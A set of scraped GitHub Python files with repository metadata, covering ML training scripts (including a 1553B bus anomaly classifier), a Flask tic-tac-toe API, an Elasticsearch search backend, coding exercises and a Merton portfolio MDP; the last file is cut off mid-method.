print(\"Elapsed time:\", \"%.2f\" % (end - start))\n\n def create_logger(self, logger_name: str = \"tb\") -> LightningLoggerBase:\n if logger_name == \"tb\":\n return TensorBoardLogger(\n save_dir=\"tb_logs\",\n name=self.data_module.data_name,\n )\n elif logger_name == \"mlf\":\n return MLFlowLogger(\n experiment_name=self.data_module.data_name,\n tags={\n \"mlflow.runName\": self.model.model_name,\n \"mlflow.user\": getpass.getuser(),\n },\n )\n else:\n raise RuntimeError(f\"Wrong logger name: {logger_name}\")\n\n def create_parser(self):\n parser = ArgumentParser(add_help=True)\n parser = self.add_trainer_parser(parser)\n parser = self.add_experiment_parser(parser)\n parser = self.data_module.add_model_specific_args(parser)\n parser = self.model.add_model_specific_args(parser)\n parser = self.early_stopping.add_callback_specific_args(parser)\n parser.set_defaults(\n progress_bar_refresh_rate=2,\n **self.parser_default,\n )\n parser.formatter_class = argparse.ArgumentDefaultsHelpFormatter\n return parser\n\n def add_trainer_parser(self, parser: ArgumentParser):\n parser = pl.Trainer.add_argparse_args(parser)\n parser.set_defaults(\n deterministic=True,\n max_epochs=100,\n )\n return parser\n\n def add_experiment_parser(self, parser: ArgumentParser):\n parser.add_argument(\n \"--no-evaluate\",\n dest=\"no_evaluate\",\n action=\"store_true\",\n help=\"do not evaluate model on validation set\",\n )\n parser.add_argument(\n \"--seed\",\n dest=\"seed\",\n type=int,\n default=random.randrange(1 << 32 - 1),\n help=\"seed for model training.\",\n )\n parser.add_argument(\n \"--logger-name\",\n dest=\"logger_name\",\n type=str,\n choices=[\"tb\", \"mlf\"],\n default=\"tb\",\n help=\"Logger name.\",\n )\n parser.add_argument(\n \"--checkpoint-monitor\",\n dest=\"checkpoint_monitor\",\n type=str,\n default=\"\",\n help=\"Metric used for checkpointing\",\n )\n parser.add_argument(\n \"--checkpoint-top-k\",\n dest=\"checkpoint_top_k\",\n type=int,\n default=1,\n help=\"Save top k models\",\n )\n parser.add_argument(\n \"--checkpoint-mode\",\n dest=\"checkpoint_mode\",\n type=str,\n choices=[\"min\", \"max\"],\n default=\"min\",\n help=\"Mode for the checkpoint monitoring\",\n )\n return parser\n","repo_name":"fuine/dmu","sub_path":"deep_memory_update/experiments/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19947691529","text":"from flask_restful import Resource\nfrom bson import ObjectId\nfrom flask import request\nfrom dao.session import get_session\nfrom dao.user import get_user_by_id, get_user_by_mail\nfrom dao.game_instance import create_game_instance, get_pending_request, accepted_game_instance, get_game_invitations_to_user, get_inactive_game_instances,get_completed_game_instances\nfrom views.game_instance import single as single_game_instance ,multiple as multiple_game_instance\n\ndef add_buttonValue_to_game_instance(gi,user):\n for obj in gi:\n opposition_user = obj[\"user1\"]\n if ObjectId(obj[\"user2\"]) != user[\"_id\"]:\n opposition_user = obj[\"user2\"]\n user_alias = get_user_by_id(opposition_user)\n obj[\"buttonValue\"] = user_alias[\"alias\"]\n return gi\n\nclass GameInstance(Resource):\n\n def get(self):\n params = request.args.to_dict()\n\n session = get_session(params['token'])\n user_id = session['user']\n\n if user_id:\n user = get_user_by_id(user_id)\n if not user:\n return {\"response\" : \"User not found\"}, 404\n\n gi_pending = get_game_invitations_to_user(user_id)\n gi_pending = multiple_game_instance(gi_pending)\n\n gi_inaction = get_inactive_game_instances(user_id)\n gi_inaction = multiple_game_instance(gi_inaction)\n\n gi_completed = get_completed_game_instances(user_id)\n gi_completed = multiple_game_instance(gi_completed)\n return {\"response\" : {\"pending\" : add_buttonValue_to_game_instance(gi_pending,user),\n \"inaction\" : add_buttonValue_to_game_instance(gi_inaction,user),\n \"completed\" : add_buttonValue_to_game_instance(gi_completed, user)}}\n\n def post(self):\n params = request.args.to_dict()\n\n session = get_session(params['token'])\n user_id = session['user']\n\n if user_id:\n requesting_user = get_user_by_id(user_id)\n if not requesting_user:\n return {\"response\" : \"User not found\"}, 404\n\n payload = request.json\n\n try:\n email = payload['email']\n except:\n return {\"response\" : \"Bad request\"} , 400\n\n requested_user = get_user_by_mail(email)\n if not requested_user:\n return {\"response\" : \"Requested User not found\"}, 404\n\n user1, user2 = requesting_user[\"_id\"], requested_user[\"_id\"]\n\n if get_pending_request(user1 ,user2):\n return {\"response\" : \"Already requested for game instance\"}\n\n gi = create_game_instance(user1, user2)\n return {\"response\" : str(gi)}\n\n def put(self):\n params = request.args.to_dict()\n\n session = get_session(params['token'])\n user_id = session['user']\n\n if user_id:\n requested_user = get_user_by_id(user_id)\n if not requested_user:\n return {\"response\" : \"User not found\"}, 404\n\n payload = request.json\n\n try:\n userid = payload[\"userid\"]\n except:\n return {\"response\" : \"Bad request\"} , 400\n\n requesting_user = get_user_by_id(userid)\n if not requesting_user:\n return {\"response\" : \"Requested User not found\"}, 404\n\n user1, user2 = requesting_user[\"_id\"], requested_user[\"_id\"]\n gi = get_pending_request(user1, user2)\n\n accepted_game_instance(gi[\"_id\"])\n\n return {\"response\" : single_game_instance(gi)}\n","repo_name":"sumitkukade/TicTacToe","sub_path":"gameservice/business_logic/serviceapis/gameinstance.py","file_name":"gameinstance.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28482292094","text":"# https://leetcode.com/problems/parallel-courses-iii/\n\nclass Solution:\n def minimumTime(self, n: int, relations: List[List[int]], time: List[int]) -> int:\n @lru_cache(None)\n def getTime(course):\n if not graph[course]:\n return time[course - 1]\n\n max_time = float(-inf)\n for crs in graph[course]:\n max_time = max(getTime(crs), max_time)\n\n return time[course - 1] + max_time\n\n graph = defaultdict(list)\n\n for i, (pre, course) in enumerate(relations):\n graph[course].append(pre)\n\n graph[n + 1] = [i + 1 for i in range(n)]\n time.append(0)\n\n return getTime(n + 1)\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_17/parallel-courses-iii.py","file_name":"parallel-courses-iii.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73248859434","text":"s = input().split()[0]\n\ncycles = []\nfor i in range(len(s)):\n s = s[1::] + s[0]\n cycles.append(s)\ncycles.sort()\n\nres = ''\nfor i in cycles:\n res += i[-1]\n\nprint(res)","repo_name":"priamoryki/ITMO","sub_path":"semester-1/discrete-math/Lab-3/TaskB.py","file_name":"TaskB.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1228624345","text":"import json\r\nimport math\r\nimport shutil\r\nimport sys\r\nimport time\r\nimport traceback\r\nfrom json import JSONEncoder, JSONDecoder\r\nfrom time import sleep\r\nfrom typing import Any, Callable, List, Union\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom torch import nn\r\nimport os\r\nimport multiprocessing as mp\r\n\r\nimport torch\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom ids.generate_default_config import PARAM_CONFIG_FILE_NAME\r\nfrom ids.traffic_classifier import BusClassifier\r\nfrom ids.dataprocess import Dataset, set_log_output\r\nfrom ids.models.gru_1553B_bus_classifier import BusClassifierGruNet\r\nfrom ids.models.lstm_1553B_bus_classifier import BusClassifierLSTMNet\r\nfrom ids.utils import create_tensor, time_since, read_param_config, get_parameters, LogFilePath\r\n\r\n\r\ndef load_parameter_from_file(file_name):\r\n file_name = os.path.abspath(file_name)\r\n if not file_name:\r\n return\r\n elif not os.path.exists(file_name):\r\n print(\"Config file not exists.\")\r\n else:\r\n return read_param_config(file_name)\r\n\r\n\r\ndef auto_train(model_parameter: dict, output=sys.stdout):\r\n is_trained = False\r\n model_common_prefix = str(model_parameter['Index'])\r\n modal_file_name = model_common_prefix + '.pth'\r\n model_path = os.path.join(model_parameter['TrainedModelPath'], modal_file_name)\r\n if os.path.exists(model_path):\r\n print(\"Model already trained. Only test.\", file=output, flush=True)\r\n is_trained = True\r\n train_log_path = os.path.join(model_parameter['TrainLogPath'], model_common_prefix + '.txt')\r\n train_result_path = os.path.join(model_parameter['TrainResultPath'], model_common_prefix + '.result')\r\n test_log_path = os.path.join(model_parameter['TestLogPath'], model_common_prefix + '.txt')\r\n test_result_path = os.path.join(model_parameter['TestResultPath'], model_common_prefix + '.result')\r\n if is_trained:\r\n f_train_log = sys.stdout\r\n f_train_result = sys.stdout\r\n else:\r\n f_train_log = open(train_log_path, 'w')\r\n f_train_result = open(train_result_path, 'w')\r\n f_test_log = open(test_log_path, 'w')\r\n f_test_result = open(test_result_path, 'w')\r\n try:\r\n # 数据读取\r\n # Use Class Dataset to preprocess raw data\r\n print(\"Reading Dataset......\", file=output, end='', flush=True)\r\n dataset = Dataset(model_parameter['TrainDatasetPath'], look_back=model_parameter['SeqLen'])\r\n # dataset = Dataset(model_parameter['TrainDatasetPath'], look_back=model_parameter['SeqLen'], is_binary=True)\r\n class_labels = dataset.get_label_classes()\r\n train_set, test_set = dataset.get_train_test_data(proportion=0.8, generator=527)\r\n print(\"Success\", file=output, flush=True)\r\n\r\n # Create DataLoader For Pytorch\r\n print(\"Generating DataLoader......\", file=output, end='', flush=True)\r\n train_loader = DataLoader(train_set, batch_size=model_parameter['BatchSize'], num_workers=0, drop_last=True)\r\n test_loader = DataLoader(test_set, batch_size=model_parameter['BatchSize'], shuffle=True, num_workers=0,\r\n pin_memory=False)\r\n print(\"Success\", file=output, flush=True)\r\n\r\n N_MESS = dataset.get_feature_num()\r\n N_TYPE = dataset.get_label_num()\r\n if N_TYPE == 2:\r\n N_TYPE = 1\r\n # Create Bus Classifier\r\n print(\"Defining Model......\", file=output, end='', flush=True)\r\n model_type = model_parameter['TypeName']\r\n if \"GRU\" in model_type:\r\n classifier = BusClassifierGruNet(input_size=N_MESS, hidden_size=model_parameter['HiddenSize'],\r\n output_size=N_TYPE, batch_first=True, num_layers=model_parameter['Layer'],\r\n bidirectional=model_parameter['Bidirectional'],\r\n dropout=model_parameter['DropRate']) # 定义模型\r\n elif model_type == \"LSTM\":\r\n classifier = BusClassifierLSTMNet(input_size=N_MESS, hidden_size=model_parameter['HiddenSize'],\r\n output_size=N_TYPE, batch_first=True, num_layers=model_parameter['Layer'],\r\n bidirectional=model_parameter['Bidirectional'],\r\n dropout=model_parameter['DropRate']) # 定义模型\r\n else:\r\n print(\"Unsupported Model Type.\", file=output, flush=True)\r\n return\r\n model_active_func = model_parameter['ActiveFunction']\r\n if model_active_func == 'ReLU':\r\n classifier.af = nn.ReLU()\r\n elif model_active_func == 'Tanh':\r\n classifier.af = nn.Tanh()\r\n elif model_active_func == 'Sigmoid':\r\n classifier.af = nn.Sigmoid()\r\n print(\"Success\", file=output, flush=True)\r\n\r\n classifier = create_tensor(classifier)\r\n # 定义损失函数criterion,使用交叉熵损失函数\r\n print(\"Defining Loss Function......\", file=output, end='', flush=True)\r\n if N_TYPE > 2:\r\n criterion = torch.nn.CrossEntropyLoss()\r\n else:\r\n criterion = torch.nn.BCEWithLogitsLoss()\r\n print(\"Success\", file=output, flush=True)\r\n # 梯度下降使用的Adam算法\r\n print(\"Defining optimizer......\", file=output, end='', flush=True)\r\n opt_choice = model_parameter['Optimizer']\r\n lr = model_parameter['LearningRate']\r\n if opt_choice == 'Adam':\r\n optimizer = torch.optim.Adam(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'NAdam':\r\n optimizer = torch.optim.NAdam(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'RMSprop':\r\n optimizer = torch.optim.RMSprop(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'Adagrad':\r\n optimizer = torch.optim.Adagrad(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'Adadelta':\r\n optimizer = torch.optim.Adadelta(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'Adamax':\r\n optimizer = torch.optim.Adamax(classifier.parameters(), lr=lr)\r\n else:\r\n print(f'Wrong optimizer:{opt_choice}', file=output, flush=True)\r\n return\r\n print(\"Success\", file=output, flush=True)\r\n bc = BusClassifier(classifier, num_epoch=model_parameter['EpochNum'], criterion=criterion, optimizer=optimizer,\r\n model_path=model_path, train_log_output=f_train_log, train_result_output=f_train_result,\r\n test_log_output=f_test_log, test_result_output=f_test_result)\r\n bc.set_class_labels(class_labels)\r\n bc.set_test_path(model_parameter['TestLogPath'])\r\n bc.set_model_name(model_common_prefix)\r\n\r\n train_result = None\r\n if not is_trained:\r\n print(\"Start training......\", file=output, flush=True)\r\n train_result = bc.trainModel(train_loader)\r\n print(\"Success\", file=output, flush=True)\r\n print(\"Start evaluating......\", file=output, flush=True)\r\n test_result = bc.eval_model(test_loader)\r\n print(\"Success\", file=output, flush=True)\r\n except Exception as e:\r\n print(e)\r\n traceback.print_exc()\r\n return\r\n finally:\r\n if not is_trained:\r\n f_train_log.close()\r\n f_train_result.close()\r\n f_test_log.close()\r\n f_test_result.close()\r\n return train_result, test_result\r\n\r\n\r\nSAVE_FILE_NAME = 'Result.xlsx'\r\n\r\n\r\ndef save_results_to_file(results, is_binary=False):\r\n \"\"\"\r\n :param results: param,train result,test result\r\n :return:\r\n \"\"\"\r\n sz = len(results)\r\n\r\n r = []\r\n for param, train_result, test_result in results:\r\n res = test_result.copy()\r\n for k, v in param.items():\r\n if 'Train' in k: continue\r\n if 'Test' in k: continue\r\n if 'Log' in k: continue\r\n if 'Path' in k: continue\r\n if 'Result' in k: continue\r\n res[k] = v\r\n tc = res['TimeCost'].strip().split(' ')\r\n mnt = int(tc[0][:-1])\r\n sec = float(tc[1][:-1])\r\n tc = mnt * 60 + sec\r\n res['TimeCost'] = tc\r\n r.append(res)\r\n\r\n output = pd.DataFrame(r)\r\n output.to_excel(SAVE_FILE_NAME, index=False)\r\n\r\n\r\nif __name__ == '__main__':\r\n config_file_name = os.path.basename(PARAM_CONFIG_FILE_NAME)\r\n config = load_parameter_from_file(config_file_name)\r\n parsed_param = get_parameters(config)\r\n # copy config file to train and test log\r\n shutil.copyfile(config_file_name, os.path.join(parsed_param['TrainLogPath'], config_file_name))\r\n shutil.copyfile(config_file_name, os.path.join(parsed_param['TestLogPath'], config_file_name))\r\n common_param = parsed_param.copy()\r\n del common_param['Parameters']\r\n print(parsed_param)\r\n with open(LogFilePath, 'w') as main_log:\r\n set_log_output(main_log)\r\n start = time.time()\r\n count = 0\r\n results = []\r\n for p in parsed_param['Parameters']:\r\n p.update(common_param)\r\n count += 1\r\n print(f'Now is {time_since(start)}', file=main_log)\r\n print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), file=main_log)\r\n print(f\"No {count} Model is training.\", file=main_log, flush=True)\r\n print(p, file=main_log, flush=True)\r\n ret = auto_train(p, output=main_log)\r\n if ret is not None:\r\n results.append((p, *ret))\r\n results.sort(key=lambda x: x[2]['Acc'], reverse=True)\r\n print('\\n\\n\\n\\n\\n', file=main_log)\r\n save_results_to_file(results)\r\n","repo_name":"MstKenway/DeepAnomalyDetection","sub_path":"DeepAnomalyDetectionWithPreciseDifferentiation/auto_train.py","file_name":"auto_train.py","file_ext":"py","file_size_in_byte":9707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14169792199","text":"\"\"\"\nSearch backend. Most likely to be deprecated soon.\n\"\"\"\n\nimport operator\nimport warnings\n\nfrom django_elasticsearch_dsl import fields\nfrom elasticsearch_dsl.query import Q\nfrom rest_framework.filters import BaseFilterBackend\nfrom rest_framework.settings import api_settings\nimport six\n\nfrom ..mixins import FilterBackendMixin\nfrom ...compat import coreapi, coreschema\n\n__title__ = 'django_elasticsearch_dsl_drf.filter_backends.search.historical'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = ('SearchFilterBackend',)\n\n\nclass SearchFilterBackend(BaseFilterBackend, FilterBackendMixin):\n \"\"\"Search filter backend for Elasticsearch.\n\n Example:\n\n >>> from django_elasticsearch_dsl_drf.filter_backends import (\n >>> SearchFilterBackend\n >>> )\n >>> from django_elasticsearch_dsl_drf.viewsets import (\n >>> BaseDocumentViewSet,\n >>> )\n >>>\n >>> # Local article document definition\n >>> from .documents import ArticleDocument\n >>>\n >>> # Local article document serializer\n >>> from .serializers import ArticleDocumentSerializer\n >>>\n >>> class ArticleDocumentView(BaseDocumentViewSet):\n >>>\n >>> document = ArticleDocument\n >>> serializer_class = ArticleDocumentSerializer\n >>> filter_backends = [SearchFilterBackend,]\n >>> search_fields = (\n >>> 'title',\n >>> 'content',\n >>> )\n >>> search_nested_fields = {\n >>> 'state': ['name'],\n >>> 'documents.author': ['title', 'description'],\n >>> }\n \"\"\"\n\n search_param = api_settings.SEARCH_PARAM\n\n def get_search_query_params(self, request):\n \"\"\"Get search query params.\n\n :param request: Django REST framework request.\n :type request: rest_framework.request.Request\n :return: List of search query params.\n :rtype: list\n \"\"\"\n query_params = request.query_params.copy()\n return query_params.getlist(self.search_param, [])\n\n def construct_nested_search(self, request, view):\n \"\"\"Construct nested search.\n\n We have to deal with two types of structures:\n\n Type 1:\n\n >>> search_nested_fields = {\n >>> 'country': {\n >>> 'path': 'country',\n >>> 'fields': ['name'],\n >>> },\n >>> 'city': {\n >>> 'path': 'country.city',\n >>> 'fields': ['name'],\n >>> },\n >>> }\n\n Type 2:\n\n >>> search_nested_fields = {\n >>> 'country': {\n >>> 'path': 'country',\n >>> 'fields': [{'name': {'boost': 2}}]\n >>> },\n >>> 'city': {\n >>> 'path': 'country.city',\n >>> 'fields': [{'name': {'boost': 2}}]\n >>> },\n >>> }\n\n :param request: Django REST framework request.\n :param queryset: Base queryset.\n :param view: View.\n :type request: rest_framework.request.Request\n :type queryset: elasticsearch_dsl.search.Search\n :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n :return: Updated queryset.\n :rtype: elasticsearch_dsl.search.Search\n \"\"\"\n if not hasattr(view, 'search_nested_fields'):\n return []\n\n # TODO: Support query boosting\n\n query_params = self.get_search_query_params(request)\n __queries = []\n for search_term in query_params:\n for label, options in view.search_nested_fields.items():\n queries = []\n path = options.get('path')\n\n for _field in options.get('fields', []):\n\n # In case if we deal with structure 2\n if isinstance(_field, dict):\n # TODO: take options (such as boost) into consideration\n field = \"{}.{}\".format(path, _field['name'])\n # In case if we deal with structure 1\n else:\n field = \"{}.{}\".format(path, _field)\n\n field_kwargs = {\n field: search_term\n }\n\n queries.append(\n Q(\"match\", **field_kwargs)\n )\n\n __queries.append(\n Q(\n \"nested\",\n path=path,\n query=six.moves.reduce(operator.or_, queries)\n )\n )\n\n return __queries\n\n def construct_search(self, request, view):\n \"\"\"Construct search.\n\n We have to deal with two types of structures:\n\n Type 1:\n\n >>> search_fields = (\n >>> 'title',\n >>> 'description',\n >>> 'summary',\n >>> )\n\n Type 2:\n\n >>> search_fields = {\n >>> 'title': {'boost': 2},\n >>> 'description': None,\n >>> 'summary': None,\n >>> }\n\n :param request: Django REST framework request.\n :param queryset: Base queryset.\n :param view: View.\n :type request: rest_framework.request.Request\n :type queryset: elasticsearch_dsl.search.Search\n :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n :return: Updated queryset.\n :rtype: elasticsearch_dsl.search.Search\n \"\"\"\n query_params = self.get_search_query_params(request)\n __queries = []\n for search_term in query_params:\n __values = self.split_lookup_name(search_term, 1)\n __len_values = len(__values)\n if __len_values > 1:\n field, value = __values\n if field in view.search_fields:\n # Initial kwargs for the match query\n field_kwargs = {field: {'query': value}}\n # In case if we deal with structure 2\n if isinstance(view.search_fields, dict):\n extra_field_kwargs = view.search_fields[field]\n if extra_field_kwargs:\n field_kwargs[field].update(extra_field_kwargs)\n # The match query\n __queries.append(\n Q(\"match\", **field_kwargs)\n )\n else:\n for field in view.search_fields:\n # Initial kwargs for the match query\n field_kwargs = {field: {'query': search_term}}\n\n # In case if we deal with structure 2\n if isinstance(view.search_fields, dict):\n extra_field_kwargs = view.search_fields[field]\n if extra_field_kwargs:\n field_kwargs[field].update(extra_field_kwargs)\n\n # The match query\n __queries.append(\n Q(\"match\", **field_kwargs)\n )\n return __queries\n\n def filter_queryset(self, request, queryset, view):\n \"\"\"Filter the queryset.\n\n :param request: Django REST framework request.\n :param queryset: Base queryset.\n :param view: View.\n :type request: rest_framework.request.Request\n :type queryset: elasticsearch_dsl.search.Search\n :type view: rest_framework.viewsets.ReadOnlyModelViewSet\n :return: Updated queryset.\n :rtype: elasticsearch_dsl.search.Search\n \"\"\"\n warnings.warn(\n \"{} is deprecated. Switch to `CompoundSearchFilterBackend`.\"\n \"\".format(\n self.__class__.__name__\n )\n )\n __queries = self.construct_search(request, view) + \\\n self.construct_nested_search(request, view)\n\n if __queries:\n queryset = queryset.query('bool', should=__queries)\n return queryset\n\n def get_coreschema_field(self, field):\n if isinstance(field, fields.IntegerField):\n field_cls = coreschema.Number\n else:\n field_cls = coreschema.String\n return field_cls()\n\n def get_schema_fields(self, view):\n assert coreapi is not None, 'coreapi must be installed to ' \\\n 'use `get_schema_fields()`'\n assert coreschema is not None, 'coreschema must be installed to ' \\\n 'use `get_schema_fields()`'\n\n _search_fields = getattr(view, 'search_fields', None)\n if isinstance(_search_fields, dict):\n search_fields = list(_search_fields.keys())\n else:\n search_fields = _search_fields\n\n return [] if not search_fields else [\n coreapi.Field(\n name=self.search_param,\n required=False,\n location='query',\n schema=coreschema.String(\n description='Search in '\n '{}.'.format(', '.join(search_fields))\n )\n )\n ]\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/filter_backends/search/historical.py","file_name":"historical.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"18131946904","text":"\"\"\"\npart 1: anyone answered yes\npart 2: everyone answered yes\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n part_1_count, part_2_count = 0, 0\n groups=open(\"input.txt\").read().split(\"\\n\\n\")\n for entry in groups:\n part_1_count+=len(set(entry.replace(\"\\n\", \"\")))\n part_2_count+=len(set.intersection(*map(set, entry.split())))\n print(part_1_count, part_2_count)\n\n\n\n","repo_name":"bethlamacchia/aoc2020","sub_path":"day6/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32414361939","text":"\"\"\"This module makes a dynamic array class without the use of a built-in list class\"\"\"\n\nimport ctypes\nimport sys\n#We're using the ctypes library to make a raw array\n\nclass DynamicArray(object):\n \"\"\"A dynamic list class\"\"\"\n\n def __init__(self):\n \"\"\"initiates the list\"\"\"\n self.element_count = 0 # the initial list is empty\n self.capacity = 1 # by default the list can only accept 1 element\n self.a_list = self.make_array(self.capacity)\n\n def __len__(self):\n \"\"\"returns the number of elements stored in the list\"\"\"\n return self.element_count\n\n def __getitem__(self,k):\n \"\"\"return the item at the given index, k\"\"\"\n if not 0 <= k < self.element_count: # if the index passed isn't between 0 and the length of the array\n return IndexError(\"K is out of bounds!\") # we need to return an error\n\n return self.a_list[k]\n\n def append(self,element):\n \"\"\"add an element to the end of the list\"\"\"\n # if our list is at capacity, we need to make it larger before we add another element\n\n if self.element_count == self.capacity:\n self._resize(2*self.capacity) # double the capacity\n\n self.a_list[self.element_count] = element\n self.element_count += 1\n\n def _resize(self, new_capacity):\n \"\"\"resize the initial array to the new capacity\"\"\"\n b_list = self.make_array(new_capacity) # <~ new, bigger array\n\n for k in range(self.element_count): # reference all existing values from the initial array into the new one\n b_list[k] = self.a_list[k]\n\n self.a_list = b_list # make the initial array into the bigger array\n self.capacity = new_capacity # set our new bigger capacity\n\n def make_array(self, new_capacity):\n \"\"\"return our array object\"\"\"\n return (new_capacity * ctypes.py_object)()\n\narr = DynamicArray()\n\nfor i in range(10):\n print(len(arr), sys.getsizeof(arr))\n arr.append(i)\n","repo_name":"Laurens-GitHub/Data-Structures-Algorithms","sub_path":"Array Sequences/Other/Dynamic_Array.py","file_name":"Dynamic_Array.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8850306439","text":"import os\nimport re\nimport sys\nimport numpy as np\nfrom typing import TypeVar, NamedTuple, Callable, Mapping, Tuple\n\n\nsys.path.append('../')\nsys.path.append('../MDP')\nfrom MDP.mdp import MDP, MDP_RL, Policy\nimport MDP.mdpUtils as mu\nfrom MDP.rlAlgorithms import MDPAlgorithmRL, MonteCarloEG\nfrom MDP.mdpAlgorithms import MDPAlgorithm, ValueIteration \n\n\nP = TypeVar('P')\n\n'''\nFINANCIAL APPLICATION #1 - Merton's Portfolio Optimization Problem\nSee e.g. https://en.wikipedia.org/wiki/Merton%27s_portfolio_problem\n\n\nFROM CLASS NOTES:\nThink of this as a continuous-time Stochastic Control problem\nThe State is (t, Wt)\nThe Action is [πt, ct]\nThe Reward per unit time is U(ct)\nThe Return is the usual accumulated discounted Reward\nFind Policy : (t, Wt) → [πt, ct] that maximizes the Expected Return\nNote: ct ≥ 0, but πt is unconstrained\n'''\n \n\nclass MertonProblem():\n\n def __init__(self, **kwargs) -> None:\n '''\n Constructor. Declare the parameters that we will be using\n to solve this portfolio optimization model \n ''' \n\n self.rho: float = kwargs[\"rho\"] # Discount rate\n self.T: float = kwargs[\"T\"] # Expiry value\n self.r: float = kwargs[\"r\"] # Riskless rate (return for the riskless asset)\n\n self.W0: float = kwargs[\"W0\"] # Initial wealth\n self.mu: np.ndarray = kwargs[\"mu\"] # Means of the risky rate (1-D array of length = # of Risky Assets)\n self.cov: np.ndarray = kwargs[\"cov\"] # Risky rate covariants (2-D square array of length = # of Risky Assets)\n self.numRiskyAssets = len(self.mu) # The number of risky assets that we have defined for the problem\n\n self.epsilon: float = kwargs[\"epsilon\"] # Bequest parameter for B(T)\n self.gamma: float = kwargs[\"gamma\"] # Parameter for CRRA utility function\n\n self.SIM_TIME = kwargs[\"SIM_TIME\"] # Total simulation time\n\n def utilityFunc(self, x: float) -> float:\n '''\n Utility function for the problem. For Merton's problem we use the \n Constant Relative-Risk Aversion model represented by the gamma param\n '''\n p = 1. - self.gamma\n if p == 0:\n result = np.log(x)\n else:\n result = x**p/p\n return result\n\n def getCFOptAllocation(self) -> np.ndarray:\n '''\n Calculates the closed-form solution of the optimal\n stock allocation among the different assets, π(W,t).\n Note however that the function takes no arguments since in the closed-form\n the optimal allocation depends on neither Wealth nor time\n '''\n # Handle the 1D case without matrix operations\n if self.cov.shape == (1,1):\n result = (1/self.cov[0][0])*(self.mu[0]-self.r)/self.gamma\n else:\n result = np.linalg.inv(self.cov).dot(self.mu-self.r)/self.gamma\n return result\n\n\n def getNu(self) -> float:\n '''\n Helper method to calculate the nu-parameter used in \n the defintion of the closed-form solution\n '''\n t1 = (self.mu - self.r).dot(self.getCFOptAllocation())/2*self.gamma\n t2 = self.r/self.gamma\n return (self.rho/self.gamma) - self.gamma*(t1+t2)\n\n\n def getCFOptConsumption(self, t: float) -> float: \n '''\n Calculates the closed-form solution of the optimal fraction\n of wealth to consume at a given time step\n '''\n nu = self.getNu()\n\n if nu == 0:\n optCons = 1./(self.T - t + self.epsilon)\n else:\n optCons = nu / (1. + (nu * self.epsilon - 1) *\n np.exp(-nu * (self.T - t))) \n return optCons\n\n\n def makeDiscretizedMDP(self) -> MDP:\n '''\n Takes the information prescribed for this Merton object\n and builds a discretized MDP out of it so that it can be solved\n using dynamic programming.\n\n To do this we will make several simplifying assumptions:\n - Discretize the state- and action-space so we can solve using a tabular method\n - Since we can't model stochastic dynamics we will make the risky asset only have two possible\n outcomes (+mu and -mu), with 50/50 probability. This assumption lets us directly prescribe\n transition probabilities into the data structure \n \n '''\n mdpData = dict()\n states = set()\n actions = set()\n terminalStates = set()\n\n # Discretize the state- and action-spaces\n # State-space discretization. We will discretize only up to\n # the max limit of growth of wealth by 5 stdevs of the highest value\n # of risky asset return over the total simulation time\n wStep = 0.01\n Wmax = round(self.W0 + (5*(np.max(self.cov)+np.max(self.mu))*self.SIM_TIME),2)\n N = (Wmax // wStep) + 2\n w = 0\n\n for w in np.linspace(0.,Wmax,N):\n for t in range(self.SIM_TIME+1):\n if t == self.SIM_TIME:\n terminalStates.add((round(w,2), t))\n else:\n states.add((round(w,2), t))\n\n # Action-space discretization\n actionStep = 0.01\n aN = (1//actionStep) + 1\n for pi in np.linspace(0, 1, aN):\n for c in np.linspace(0, 1, aN):\n actions.add((pi,c))\n\n # Fill out the dict with our discretized state- and action-spaces. \n for state in states:\n mdpData[state] = dict()\n for action in actions:\n W, t = state\n pi, c = action\n mdpData[state][action] = dict()\n\n # Determine the two possible successor states, for each of the possible\n # two return values of the risky asset.\n # the net of our returns from all assets, less the amount we invested (c_t*W_t)\n # (Note that is NOT the same as reward, which is computed using the utility function) \n wPos = round(W + W*c*((1-pi)*self.r + pi*self.mu[0]), 2) \n wNeg = round(W + W*c*((1-pi)*self.r - pi*self.mu[0]), 2) \n # Assign reward of the final wealth if it's a terminal state. Otherwise\n # the reward is zero\n if t == self.SIM_TIME:\n tNew = t + 1\n rPos = self.utilityFunc(wPos)\n rNeg = self.utilityFunc(wNeg)\n else:\n tNew = t\n rPos = 0\n rNeg = 0\n\n succPos = (wPos, tNew)\n succNeg = (wNeg, tNew)\n # Populate dict\n if state not in terminalStates:\n mdpData[state][action][succPos] = (0.5, rPos) \n mdpData[state][action][succNeg] = (0.5, rNeg) \n else:\n mdpData[state][action][state] = (1.0, 0)\n\n return MDP(mdpData, (1-self.rho))\n\n\n def 